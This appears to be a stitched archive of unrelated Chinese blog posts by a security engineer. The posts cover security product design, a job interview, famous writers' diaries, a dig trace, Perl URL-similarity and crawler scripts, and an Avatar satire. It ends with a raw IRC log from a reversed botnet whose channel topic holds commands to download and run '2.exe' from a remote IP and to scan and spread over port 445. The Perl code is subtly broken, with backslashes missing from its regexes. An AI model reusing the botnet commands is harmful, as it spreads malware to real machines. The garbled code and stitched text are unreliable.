http://www.networkworld.com/newsletters/wireless/2010/072610wireless1.html

http://www.thaindian.com/newsportal/health/the-chicken-may-have-come-before-the-egg-sort-of_100395550.html

国内比较大的互联网公司，多多少少都会有一些自己的安全产品。之所以自己开发而不是直接采购，我想有很大的原因在于定制化。基于对公司业务的了解，对公司流程的熟悉，自己开发最终能够做出不是很通用但是却最适合自己公司的产品。同时，可以和运营方频繁的沟通，最终再易用性方面也得到较大的提升，这些都是坐在屋子里很难设计出来的。

不过另外一方面，我觉得定制化也是要有一个粒度的，过尤不及。最近在产品的设计、推广方面，就遇到一点类似的问题。产品设计的当初，是否好运营，易用性如何肯定是要考虑的。但是根据一个具体的“个人”的运营方式去决定产品的走向，我觉得是不可取的。因为产品做出来，不是给一个人去运营使用，而是给一个群体来运营，随时是可能够换人的，不可能根据某一个人的工作习惯来决定。站在运营者这个“群体”的角度，来考虑设计是最恰当的。

电脑可以定制，可以要求什么牌子的主板，多大的内存，什么牌子的网卡，但是你不能要求说要指定地点的硅矿石提炼出来的硅做的CPU。如果要照顾到每一个人的习惯，那么只能在功能、基础的易用性得到满足后，去提供一些API让特定的人可以根据自己的工作习惯来开发定制。

安全产品这一块，我想刺也许也有很多体会吧，我懒得再写下去了，也许可以建议他写一篇长的。我到想看看下次我再想扯点什么的时候，是不是可以说一下流程方面的事情。

这位仁兄有12年的IT经验，8年的网络安全经验，资历还是比较深的，所以我电话沟通之前问了一下他比较擅长的方向，再去聊具体的问题。顺便说一下，这次面试的职位是OA网络安全方面的。得知他在IDC和OA安全架构方面都很有研究的时候，我就问了一个OA的问题，并不是很简单，也许我09年上半年还不能有很好的回答。他说了最简单的第一点之后就有些支吾了，没有下文，于是反问我公司在哪里上班。我说了在杭州之后他就说他不会离开现在的地方，对杭州没兴趣，就马上把电话挂断了。

这个还没什么，有意思的是我把面试情况反馈给HR后，HR联系猎头说明这个情况。随后，猎头与他沟通之后给过来的反馈说他认为问题太简单了，不屑于回答。

悲剧。

7月4日
新开这本日记，也为了督促自己下个学期多下些苦功。先要读完手边的莎士比亚的《亨利八世》……

7月13日
打牌。

7月14日
打牌。

7月15日
打牌。

7月16日
胡适之啊胡适之！你怎么能如此堕落！先前订下的学习计划你都忘了吗？
子曰：“吾日三省吾身。”…不能再这样下去了！

7月17日
打牌。

7月18日
打牌。

季羡林的日记：

二日
今天才更深切地感到考试的无聊。一些放屁胡诌的讲义硬要我们记!
大千走了，颇有落寞之感。

十三日
昨夜一夜大风，今天仍然没停，而且其势更猛。
北平真是个好地方，唯独这每年春天的大风实在令人讨厌。
没做什么有意义的事——妈的，这些混蛋教授，不但不知道自己泄气，
还整天考，不是你考，就是我考，考他娘的什么东西?

二日
今天作Faust的Summary
无论多好的书，even Fausteven Faust。
只要拿来当课本读，立刻令我感觉到讨厌，这因为什么呢?我不明了。
过午看女子篮球赛，不是去看想［打］篮球，我想，只是去看大腿。
因为说到篮球，实在打得不好。

三日
今天整天都在预备Philology，真无聊。我今年过的是什么生活?不是test，
就是reading report，这种生活，我真有点受不了。

四日
今天早晨考Philology，不算好。
过午作Faust的Summary，也不甚有聊。
这几天来，一方面因为功课太多，实在还是因为自己太懒，Helderlin的诗一直没读，这使我难过，为什么自己不能督促自己呢?不能因了环境的不顺利，
就放弃了自己愿意读的书(写文章，也算在内)。

五日
今天又犯了老毛病，眼对着书，但是却看不进去，原因我自己明白：因为近几天来又觉到没有功课压脑袋了。我看哪一天能把这毛病改掉了呢?我祈祷上帝。
零零碎碎地看了点H?lderlin，读来也不起劲，过午终于又到体育馆去看赛球。

五日
开始作论文，真是“论”无可“论”。
晚上又作了一晚上，作了一半。 听别人说，毕业论文最少要作二十页。
说实话，我真写不了二十页，但又不能不勉为其难，只好硬着头皮干了。

二十五日
……今天开始抄毕业论文，作到［倒］不怎样讨厌，抄比作还厌。……

二十六日
今天抄了一天毕业论文，手痛。……

恰好5.1在家看到wzt写了一篇这样的文章，讨论的人很多。我有点心痒，就稍微说几句。简单的说，我的想法是安全研究不仅仅是研究溢出，研究内核，研究xss，研究各种新的攻击方式。研究如何让一个有1万台服务器部署了各种应用的网络安全，研究如何在拥有3万名员工的办公区域不泄漏敏感信息，这个也是技术研究，并没有完全束缚到业务里面。何况即使在乙方，也不会有天马行空的屠龙之术。

以《神鞭》的一句话结尾，辫子剪了，神留着，一变又是绝活。

前略，天国的河蟹们，草泥马现在是超越阿姆 骡的存在

发展中的草泥马语

• 在我们随机调查的100个网友中，有87.35%的网友认为草泥 马语非常好！
• 草泥马语第一个社区请求（Grass Community Request）：GCR001_W3C_DOM_Support_Draft 于即日起开始草稿范本的起草工作，欢迎广大戈壁公民对该范本提出宝贵意见。
• 我们很高兴的接受了《中国人如何做爱》项目组提交 的草泥马语的第一个issue: issue 1 关于草泥马语的CHTML支持问题。对此，草泥马语项目组作出了积极响应并得到了戈壁中央的大力支持，我们一定能够与CHTML项目组一起，为了建设现代 化的马勒戈壁而奋斗。
• 热烈欢迎草泥马语的兄弟语言八卦语，虽然我们目前没有找到这个语言的官方网站，但是根据民法宪法刑法等有关法律，我们相信有官部门一定会解决 这个困难，为了我朝网络的二胖化的进程奋斗！
• 经过戈壁政府的不懈努力，值此2010年新春佳节之际，戈壁政府推出草泥马虚拟机贺岁版，草泥马语发展进程迈向新的台阶！
• 再次非常高兴的接到dexter.yy童 鞋提交的本项目的第二个issue，这为草泥马走向网络提供了技术支持，首先感谢dexter.yy同学对项目的支持和厚爱，再次 感谢所有关心本项目的所有网友。

主页参见：http://code.google.com/p/grass-mud-horse/

这种不涉及到具体用户具体交易的数据，在宏观上反映出来的趋势或者分布作用依旧是巨大的。从事业来说，你能够知道杭州哪个地区的人最喜欢买鲜花，上海哪个地区的人最喜欢买MP3，也许你可以开一个实体店。从猥琐的说，你能够知道哪里的人平均胸围最大，哪里的人的喜欢买充气娃娃。

这就是数据的力量，恰好最近我也在积累数据，希望能够说明一些问题。

有疑问请点击http://www.free-av.com/

dig baidu.com +trace

; <<>> DiG 9.5.1-P2.1 <<>> baidu.com +trace
;; global options:  printcmd
.                       349711  IN      NS      G.ROOT-SERVERS.NET.
.                       349711  IN      NS      H.ROOT-SERVERS.NET.
.                       349711  IN      NS      I.ROOT-SERVERS.NET.
.                       349711  IN      NS      J.ROOT-SERVERS.NET.
.                       349711  IN      NS      K.ROOT-SERVERS.NET.
.                       349711  IN      NS      L.ROOT-SERVERS.NET.
.                       349711  IN      NS      M.ROOT-SERVERS.NET.
.                       349711  IN      NS      A.ROOT-SERVERS.NET.
.                       349711  IN      NS      B.ROOT-SERVERS.NET.
.                       349711  IN      NS      C.ROOT-SERVERS.NET.
.                       349711  IN      NS      D.ROOT-SERVERS.NET.
.                       349711  IN      NS      E.ROOT-SERVERS.NET.
.                       349711  IN      NS      F.ROOT-SERVERS.NET.
;; Received 436 bytes from 208.87.241.170#53(208.87.241.170) in 0 ms

com.                    172800  IN      NS      D.GTLD-SERVERS.NET.
com.                    172800  IN      NS      H.GTLD-SERVERS.NET.
com.                    172800  IN      NS      L.GTLD-SERVERS.NET.
com.                    172800  IN      NS      C.GTLD-SERVERS.NET.
com.                    172800  IN      NS      G.GTLD-SERVERS.NET.
com.                    172800  IN      NS      J.GTLD-SERVERS.NET.
com.                    172800  IN      NS      B.GTLD-SERVERS.NET.
com.                    172800  IN      NS      E.GTLD-SERVERS.NET.
com.                    172800  IN      NS      F.GTLD-SERVERS.NET.
com.                    172800  IN      NS      K.GTLD-SERVERS.NET.
com.                    172800  IN      NS      A.GTLD-SERVERS.NET.
com.                    172800  IN      NS      I.GTLD-SERVERS.NET.
com.                    172800  IN      NS      M.GTLD-SERVERS.NET.
;; Received 499 bytes from 192.58.128.30#53(J.ROOT-SERVERS.NET) in 153 ms

baidu.com.              172800  IN      NS      dns.baidu.com.
baidu.com.              172800  IN      NS      ns2.baidu.com.
baidu.com.              172800  IN      NS      ns3.baidu.com.
baidu.com.              172800  IN      NS      ns4.baidu.com.
;; Received 163 bytes from 192.43.172.30#53(I.GTLD-SERVERS.NET) in 166 ms

baidu.com.              600     IN      A       220.181.6.81
baidu.com.              600     IN      A       220.181.6.184
baidu.com.              600     IN      A       61.135.163.94
baidu.com.              86411   IN      NS      ns2.baidu.com.
baidu.com.              86411   IN      NS      ns3.baidu.com.
baidu.com.              86411   IN      NS      ns4.baidu.com.
baidu.com.              86411   IN      NS      dns.baidu.com.
;; Received 211 bytes from 61.135.165.235#53(ns2.baidu.com) in 251 ms

pwnat, pronounced "poe-nat", is a tool that allows anynumber of clients behind NATs to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. The server does not need to know anything about the clients trying to connect.

Simply put, this is a proxy server that works behind a NAT, even when the client is behind a NAT, without any 3rd party.There is no middle man, no proxy, no 3rd party, no UPnP/STUN/ICE required, no spoofing, and no DNS tricks.

BTW，作者似乎是以前XSS蠕虫干掉过space.com那位，博客在http://samy.pl/pwnat/

细想起来还要从05年进入绿盟算起。那时候我刚走出校门不久，懂的都是点入侵渗透方面的知识，会写一点C代码和Perl代码以及ASP代码。工作中最大的挑战来源于非常的害羞，与人沟通差得一塌糊涂。第一次讲PPT完全是在读书，讲完后自己都不知道自己说了一些什么（顺便提一下现在盛大的某位CCIE同学和我一起讲的，状态也和我类似，^_^）。还好在sbilly、adam等人的带领下，逐渐熟悉了起来，也开始敢给客户讲PPT，介绍一些攻击防御技术以及渗透加固的方案。

06年到雅虎后，遇到的最大挑战是从乙方思维向甲方的转变，从以前比较单纯的渗透、加固、培训工作变化到制定一个公司网络方面的安全策略规范并设计方案，推动业务部门部署。得益于Lucy曾经一段时间内耐心的让我写日报并帮助我review，我的执行力不足的缺陷有了初步的弥补。在david和lucy的帮助下转型期很顺利，对事情的宏观把握，跨部门的沟通能力以及项目的计划性都得到了一点增强，甚至学习了招人时的面试技巧。雅虎的两年是提升最快给我帮助最大的两年，这两年中一直和luoluo、zendy等牛人一起做安全工作，并且我亲爱的LP也和我在一起了。当时北京有EMM、Mix、肉肉、CoCo等一大票鸟人，经常一起喝酒滑雪K歌，人生快事莫过于此。值得一提的是在雅虎工作中我最得意的事情，仅仅花了一个星期的时间，就从对无线网络一窍不通到成功设计了雅虎在温特莱办公区的无线网络。

08年初因为身体原因以及家庭原因，离开北方往南边靠。从雅虎离职到久游，短暂的两个月工作依旧有一些收获，让我相信真的有企业文化这种东西，因此迅速离开。

08年3月份到阿里巴巴以来，挑战首先来自于工作对象的转变，从雅虎时的单一公司变为集团，沟通和协作很多时候都是跨越BU进行。其次来自于要做一些没有人做过，至少没有公开的可以借鉴的成功经验的事情。09年主要表现在滨江办公园区的网络安全方案设计，7座大楼，10000多个PC和服务器，有线和无线。幸好，和IT部门配合算是完成了。不过2010年的挑战来得更早，也更大——云计算的安全，好在这边有更多的牛人同事。我开始有点期望2010年的结局，以及2011年的开头了——虽然离2012更近——至少我们有春哥。

此记。

摘要：我是在洗澡的间隙，坐在马桶上写这篇博客的。因此，凌乱、间断、错漏肯定是有的，只是我怕思路断了会忘记，所以还是记录下来先。前些时候写过一个利用Bloom Filter消除重复URL的文章，今天想了下相似URL判定的方法。URL相似度的判定，在WEB黑盒扫描工具中是很有用的。

最开始想到的是URL也是一个特殊的字符串，那么URL的相似度判定就转化成了字符串相似度判定了。这个问题已经有了很多算法，比较著名的有俄国人的Edit Distance。但是仔细思考后，这个算法做普通字符串相似度比较是可以的，但是作为URL这种特殊的内容来比较则会有很多问题。举例来说，http://www.xxx.com/123.html到http://www.xxx.com/456.html的距离（相似度）与到http://www.xxx.com/abc.html的距离是一样的，但是对于URL来说前面两个是相似的URL，第一个与第三个则不是，这属于特殊条件下的误判。

于是我想到，URL是有结构的，也许我们可以利用这种结构来做判定。对于人来说，一眼就能看出http://video.sina.com.cn/ent/s/h/2010-01-10/163961994.shtml和http://video.sina.com.cn/ent/s/h/2010-01-10/163961890.shtml是相似的URL。但是与http://video.sina.com.cn/ent/m/c/2010-01-10/164661995.shtml呢？则未必，这取决于你如何看待目录本身，可以认为是相似的，也可以认为不是。基于结构来判断URL相似度，我的想法是去掉数字这种东西本身，最终只保留一个结构。字符串是否也需要去掉自身只保留结构，或者保留存在长度的结构，可以根据情况来灵活取舍。

随手写了一段脚本印证想法，这里我没有去掉字符串，仅仅将数字转变成结构了。URL中的参数，我去掉了值，其实这里的值也可以保留结构本身的。冷……不写了。

#!/usr/bin/perl
use strict;
use warnings;
 
my $url1 = 'http://video.sina.com.cn/ent/s/h/2010-01-10/163961994.shtml?a=1&b=10';
my $url2 = 'http://video.sina.com.cn/ent/m/c/2010-01-10/164661995.shtml?b=2&a=5';
 
my @array1 = split( ///, $url1 );
my @array2 = split( ///, $url2 );
 
if( @array1 != @array2 )
{
	print "they are not the similar url.\n";
	return;
}
 
for( my $i = 3; $i < @array1; $i ++ )
{
	$array1[$i] =~ s/d+/d/g;
	$array2[$i] =~ s/d+/d/g;
 
	#we should compare char sometimes.
	#$array1[$i] =~ s/[a-zA-Z]/c/g;
	#$array2[$i] =~ s/[a-zA-Z]/c/g;
}
 
my $flag1 = index( $array1[-1], '?' );
my $flag2 = index( $array2[-1], '?' );
my $tmp1 = substr( $array1[-1], $flag1 + 1 );
my $tmp2 = substr( $array2[-1], $flag2 + 1 );
 
if( $flag1 != -1 )
{
	$array1[-1] = substr( $array1[-1], 0, $flag1 );
	$array2[-1] = substr( $array2[-1], 0, $flag2 );
 
	my @tmp_arr = split( /&/, $tmp1 );
	for( my $i = 0; $i < @tmp_arr; $i ++ )
	{
		$tmp_arr[$i] =~ s/=.*//g;
	}
	$array1[-1] = $array1[-1]. '?'. join( '&', sort @tmp_arr );
}
 
if( $flag2 != -1 )
{
	my @tmp_arr = split( /&/, $tmp2 );
	for( my $i = 0; $i < @tmp_arr; $i ++ )
	{
		$tmp_arr[$i] =~ s/=.*//g;
	}
	$array2[-1] = $array2[-1]. '?'. join( '&', sort @tmp_arr );
}
my $result1 = join( '/', @array1 );
my $result2 = join( '/', @array2 );
 
print $url1, "\n\t==>\n\t    ", $result1, "\n\n";
print $url2, "\n\t==>\n\t    ", $result2, "\n";
 
if( $result1 eq $result2 )
{
	print "\nthey are the similar url\n";
}
else
{
	print "\nnot\n";
}
脚本非常的乱，不过只是为了验证想法而已，没有关系。

上班的间隙，观察一下蚂蚁的行为还是很有意思的。我能感知它们，他们却感知不到我。关键是，即使他们感知到我，我也不在乎。作为一个生存在二维空间的生物，蚂蚁还是很可怜的，不过也很开心。希望没有一个五维空间的生物，现在正在看我看蚂蚁，同时也在写他的博客。

其实看了就知道，《阿凡达》是一部反映钉子户抗暴力拆迁的影片，转自http://www.tianya.cn/publicforum/content/free/1/1778729.shtml。

第一阶段：2154年，一个叫RDA的土地开发公司，来到一个叫潘多拉的地方搞开发，号召大家只要搬家就可以有诱人的赔偿。可那条街居民大多一根筋，说这里是他们祖祖辈辈居住的地方，再多的钱也不干，再好的地方也不去。开发商就很恼火，这家开发公司其实是有半政府背景的，手下还有一些性格暴烈的打手，就像城管，于是开始打。但居民们拥有一些稀奇古怪的自制武器如弓箭、石头，还有违章的大型宠物如长颈马、迅雷兽，男女老少都很难缠，加之是老街，地形复杂道路崎岖，手机信号都有死角，所以开发商一时得不了手，还伤了不少人，这个时候开发商就想出派“阿凡达”去当卧底的点子。所谓“阿凡达”计划其实是让人化妆成当地居民刺探他们的底牌，了解地形，分化瓦解，为开发商提供最佳拆迁方案。

第二阶段：可是这个叫“杰克”的阿凡达在卧底时不小心泡上了当地居民首领的女儿，发生真感情，卧底就被反卧底，就反过来动员开发商不要强行拆迁，要体恤民意，他还可以帮忙跟居民沟通做工作。开发商毛了，更毛的是城管头子（那个叫夸奇的退役军人），觉得杰克简直丢了城管的脸，一怒之下就率部前去攻打，有道是“给我三千城管，一夜收复台湾”，他们有巨型推土机，有定向爆破，有武装施工队，一时居民望风披靡，还死了抗暴力拆迁的领导人，也就是那女孩的爸爸。

第三阶段：这时杰克终于明白，根本不需要什么沟通，大家只能以暴制暴，他带领居民们用最土的武器与城管殊死搏斗，自制燃烧瓶、弹弓、大型野生的或家养的宠物、把物件卡在城管的推土机的齿轮中…… 最后一幕很有喻意，武装到牙齿的城管头子被女孩用最土的弓箭射杀，代表强势政权和极端武力的一方被代表民意和传统一方制服。

看了这部钉子户史诗般的巨片后我有几点感想：

一、正义。各方都觉得自己代表着正义的，比如开发商认为他是拉动了GDP，搞活了经济，为这个落后愚昧的老街带来新气象，只是遭到不明真相群众的抵制；比如城管头子认为叛徒杰克简直不可理喻，作为一名前军人怎可以不听组织上的指挥，那些垃圾生物一排炮打死得了，废什么话；居民们则认为，他们不需要也不接受所谓“美好生活”，对于“美好生活”他们有自己的标准，他们就愿意住在树洞里跟神灵在一起，而不愿去住高级电梯公寓。这个感想是：所有的战争都是因为自以为的正义感而起的，但真正的正义是——不要轻易改变别人生活的方式。

二、觉悟。影片没有交待是否有漫天要价的情节，而那些居民们住的是黄金口岸，开发商确实也开出了很高的价格，但居民们还是不搬迁，那棵上千米高的大树成为钉子户们伟大的图腾，就像一枚参天的钉子，脚下的根蔓则是链接千万年来亲情的基础，他们是为这个活着的。开发商不理解这个，认为那棵树就是违章建筑，那些居民就是刁民，不醒事体，不支持城市建设，没有牺牲小我成就大我的觉悟。感想是：人类过度发达的结果我们已经看到了，就是玩得自己资源殆尽，就去抢别人的资源。

三、自焚。居民们在高科技的飞行器来到之时还不躲避，还倔强地伫立在那棵大钉子前，其实是在玩自焚。自焚不划算的，根本感动不了开发商，推土机、飞行器里的城管们看着居民烧成碳化物后还哈哈大笑，觉得这些生物真的很二逼。所以以暴制暴的杰克才是对的，他带领大家直扑过去，一顿乱打，城管们才惊慌失措，居民们才换回了家园。

四、叛徒。作为人类的我生平第一次为外星人而背叛了人类，当外星土著与地球城管们搏斗时，我是悄悄站在他们那边的，城管们每回向外星人开枪时就紧张，每死一个外星土著就黯然神伤，那些大鸟每抓下一架飞机时就很想鼓掌，及至躲杀城管头子时，我生怕他复活过来希望那个外星土著美女赶紧补上一箭……估计这些叛徒的念头很多看了影片的人也是有的，因为无论中国人外国人都仇恨强行拆迁的事情（中国人为甚），大家就代入感了，就同仇敌忾了。其实那些外星土著长得并不好看，但是看着看着就觉得她们很妩媚了，因为，所有的生物不是因为符合人类的审美标准而美丽，而是因为心灵的相通而美丽。

五、很多中国电影人都在评论《阿凡达》在电影技术上的领先，也说过这部片子是视觉盛宴但内容一般。我就知道中国电影为什么落后了，土鳖的中国电影人根本不知什么是好作品，他们要么把一部作品的主题搞得神神叨叨，比如《三枪》，要么搞得高层建瓴、文以载道，比如……很多。好的作品就是反映人性的，而不是D性或政府性的，中国电影人也不是不知道这个，他们先是不敢，后便不能了，这方面功能被割掉了，所以中国电影人大部份是太监，中国电影就是太监电影，我们拍点被矫改过的历史片就可以了，幻想片是肯定不行的，不是我们技术不行，而是我们想像力不行，不是想像力不行，而是不敢对未来负责任，只想对有关部门负责就可以了。这时候，电影就不是电影，而是有关部门和有关精神的皮影。

有唐福珍、有潘蓉、有最牛钉子户、有河南、四川、上海最强悍城管，还有拆迁办与非常中国的《城市房屋拆迁管理条例》，我怀疑卡梅隆是悄悄在中国卧底多年后才想出这个剧本的，只不过把结尾弄得光明一些。总之，《阿凡达》是一部讴歌钉子户抗击暴力拆迁的成功典范，不论战术上还是战略上都值得借鉴。技术上中国电影落后五十年，人性上中国电影落后五千年。

update：2010年1月4日同事在项目中使用，所以我略微review了一下代码。有点小的改动，主要是线程互斥。

摘要：昨天阴沉了一天，闷在家里做了个简单的爬虫，主要是多线程、队列、Bloom Filter等的使用，算是个demo吧。今天终于下雪了，和LP出去走了走，很有感觉。

update：2010年1月4日同事在项目中使用，所以我略微review了一下代码。有点小的改动，主要是线程互斥。

#!/usr/bin/perl
use strict;
use warnings;
#use Data::Dumper;
use threads;
use threads::shared;
use Thread::Queue;
use Thread::Semaphore;
 
use Bloom::Filter;
use URI::URL;
use Web::Scraper;
 
my $max_threads = 15;
my $base_url = $ARGV[0] || 'http://www.icylife.net';
my $host = URI::URL->new($base_url)->host;
 
my $queue = Thread::Queue->new( );
 
my $semaphore = Thread::Semaphore->new( $max_threads );
my $mutex = Thread::Semaphore->new( 1 );
 
my $filter = shared_clone( Bloom::Filter->new(capacity => 10000, error_rate => 0.0001) );
 
$queue->enqueue( $base_url );
$filter->add( $base_url );
 
while( 1 )
{
        # join all threads which can be joined
        #my $joined = 0;
        foreach ( threads->list(threads::joinable) )
        {
                #$joined ++;
                $_->join( );
        }
        #print $joined, " joined\n";
 
        # if there are no url need process.
        my $item = $queue->pending();
        if( $item == 0 )
        {
                my $active = threads->list(threads::running);
                # there are no active thread, we finish the job
                if( $active == 0 )
                {
                        print "All done!\n";
                        last;
                }
                # we will get some more url if there are some active threads, just wait for them
                else
                {
                        #print "[MAIN] 0 URL, but $active active thread\n";
                        sleep 1;
                        next;
                }
        }
 
        # if there are some url need process
        #print "[MAIN] $item URLn";
        $semaphore->down;
        #print "[MAIN]Create thread.n";
        threads->create( \&ProcessUrl );
}
 
# join all threads which can be joined
foreach ( threads->list() )
{
        $_->join( );
}
 
sub ProcessUrl
{
        my $scraper = scraper
        {
                process '//a', 'links[]' => '@href';
        };
 
        my $res;
        my $link;
 
        while( my $url = $queue->dequeue_nb() )
        {
                eval
                {
                        $res = $scraper->scrape( URI->new($url) )->{'links'};
                };
                if( $@ )
                {
                        warn "$@\n";
                        next;
                }
                next if (! defined $res );
 
                #print "there are ".scalar(threads->list(threads::running))." threads, ", $queue->pending(), " urls need process.\n";
 
                foreach( @{$res} )
                {
                        $link = $_->as_string;
                        $link = URI::URL->new($link, $url);
 
                        # not http and not https?
                        next if( $link->scheme ne 'http' && $link->scheme ne 'https' );
                        # another domain?
                        next if( $link->host ne $host );
 
                        $link = $link->abs->as_string;
 
                        if( $link =~ /(.*?)#(.*)/ )
                        {
                                $link = $1;
                        }
 
                        next if( $link =~ /.(jpg|png|bmp|mp3|wma|wmv|gz|zip|rar|iso|pdf)$/i );
 
                        $mutex->down();
                        if( ! $filter->check($link) )
                        {
                                print $filter->key_count(), " ", $link, "\n";
                                $filter->add($link);
                                $queue->enqueue($link);
                        }
                        $mutex->up();
                        undef $link;
                }
                undef $res;
        }
        undef $scraper;
        $semaphore->up( );
}
 

cat了一下没cat进去，最后用perl搞定的。 perl -e 'open(FH, ">>/etc/apt/sources.list") || die "open error";print FH "deb http://ftp.de.debian.org/debian lenny main\n";close FH;'

Abstract

This specification defines the HTML device element, to enable video conferencing from HTML applications.

      补充：我把逆向出来的结果给我们的harry同学了，他下午研究了下，最终跑进IRC了。

$ nc -v rose.linkpc.net 8280
Warning: inverse host lookup failed for 60.10.179.100: Unknown host
rose.linkpc.net [60.10.179.100] 8280 (?) open
PASS lol
NICK CHN|XP|SP2|01827162
USER chn * 0: chn
PING :D9839FD2
PONG :D9839FD2
:. 004 CHN|XP|SP2|01827162
:. 005 CHN|XP|SP2|01827162  :
:. 005 CHN|XP|SP2|01827162  :
:. 005 CHN|XP|SP2|01827162  :
JOIN #tsunami3
:CHN|XP|SP2|01827162!chn@65.99.199.216 JOIN :#tsunami3
:. 332 CHN|XP|SP2|01827162 #tsunami3 :|.ddosstop -s|.stop -s|.shttp http://60.10.179.100:15555/2.exe -s|.asc net445 100 5 9999 -b -r -s
:. 333 CHN|XP|SP2|01827162 #tsunami3 ssss 1259808419
:. 353 CHN|XP|SP2|01827162 @ #tsunami3 :CHN|XP|SP2|01827162
:. 366 CHN|XP|SP2|01827162 #tsunami3 :End of /NAMES list.